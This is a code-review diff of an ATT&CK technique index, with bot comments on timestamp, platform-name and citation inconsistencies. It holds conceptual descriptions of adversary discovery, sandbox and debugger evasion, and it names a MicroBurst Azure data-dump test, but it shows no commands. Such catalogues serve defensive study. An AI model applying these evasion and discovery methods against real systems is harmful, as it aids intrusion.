+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
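Review bot: `x_mitre_permissions_required` with its single `User` value is dropped from T1087.004 (the `- x_mitre_permissions_required:` / `- - User` lines) with no replacement field added; confirm nothing in the index consumers keys on it and mention it in the changelog, since this hunk otherwise only reorders keys and references. The carried-over source name `Google Cloud - IAM Servie Accounts List API` keeps its upstream misspelling, which is correct here because `(Citation: ...)` lookups match on the exact string.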
@@ -51080,46 +51771,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -51143,6 +51799,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -51153,9 +51812,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -51165,12 +51829,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
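Review bot: the `modified` timestamp for T1069.001 moves backwards (`- modified: '2023-05-09T14:00:00.188Z'` to `+ modified: '2023-04-07T17:14:42.184Z'`), and the same happens for several techniques further down. The old values share the `T14:00:00.188Z` suffix, which looks like a release stamp rather than a per-object time, while the new values look like upstream STIX `modified` values; that is probably the intended fix, but the PR description should state it so nobody reads the regression as a stale import. Separately, the `+` block at the end of the T1497.002 object re-adds, with identical values, the `id`, `type`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` that the first hunk removed from its top, so most of this hunk is key-order churn; emitting keys in a stable order from the generator would keep future regenerations reviewable.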
@@ -51213,12 +51904,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51229,28 +51919,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -51283,9 +51976,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -51328,7 +52020,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -51367,13 +52059,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
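Review bot: for T1614.001 both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing in this hunk adds the 3.2.0 value back, whereas T1497.002 above received `+ x_mitre_attack_spec_version: 3.2.0`. Please confirm the replacement lands elsewhere in the T1614.001 object; if not, this technique ends up with no ATT&CK spec version at all.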
@@ -51414,87 +52104,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
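Review bot: T1614 loses `x_mitre_permissions_required: - User` (removed near the end of the hunk) with no replacement, while its sub-technique T1614.001 keeps that field as unchanged context in the previous hunk. If that mirrors upstream retiring the field it is fine, but any tooling in this repo that filters on `x_mitre_permissions_required` will now see parent and sub-technique disagree, so call it out in the PR description. The rest of the hunk is reordering: description, detection text, contributors and references move rather than change, apart from `x_mitre_version` 1.0 to 1.1, the FBI Ragnar Locker URL host changing from assets.documentcloud.org to s3.documentcloud.org, and its retrieved date.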
@@ -51547,17 +52235,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
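Review bot: the T1526 description now reads `Microsoft Graph API` where it used to read `Azure AD Graph API`, but the sentence still ends with `(Citation: Azure AD Graph API)` and that reference key is unchanged. Either the citation key should follow the rename or the sentence should keep naming the API the cited source documents; as written the text and its citation point at different APIs. The `Azure AD` to `Entra ID` rename in the first paragraph has no such mismatch.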
@@ -51565,10 +52252,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51577,15 +52266,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
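Review bot: the T1526 platform list drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (with `x_mitre_version` going 1.3 to 1.4). Any platform-keyed index or filter in this repo that still matches the old names will silently stop listing T1526, so those consumers need the same rename in this PR or a follow-up. The added data source `Logon Session: Logon Session Creation` is consistent with the T1538 object below, which already lists it.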
@@ -51613,9 +52303,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests:
- name: Azure - Dump Subscription Data with MicroBurst
@@ -51750,7 +52437,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
@@ -51822,7 +52508,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -51871,12 +52556,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51897,12 +52581,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51927,7 +52610,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
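Review bot: after the `spec_version` removal, T1538 goes straight from `x_mitre_modified_by_ref` to `atomic_tests: []` with no `identifier: T1538` line, while the neighbouring T1518 entry carries `identifier: T1518` before its `atomic_tests`. That looks pre-existing rather than introduced here, but since the generator is rewriting this tail anyway it would be worth emitting the key consistently, or confirming that nothing keys off it.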
@@ -51982,7 +52664,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
@@ -52002,7 +52684,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
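Review bot: T1622 keeps `x_mitre_attack_spec_version: 2.1.0` as an unchanged line while `spec_version: '2.1'` is removed beneath it, so it is the only object visible in this diff still on the 2.1.0 ATT&CK spec version after the others move to 3.2.0. If the upstream T1622 object really still carries 2.1.0 that is an upstream quirk worth a comment in the PR; if the generator simply did not rewrite it, this hunk should bump it like the rest.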
@@ -52105,13 +52786,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52122,7 +52802,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52193,29 +52873,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
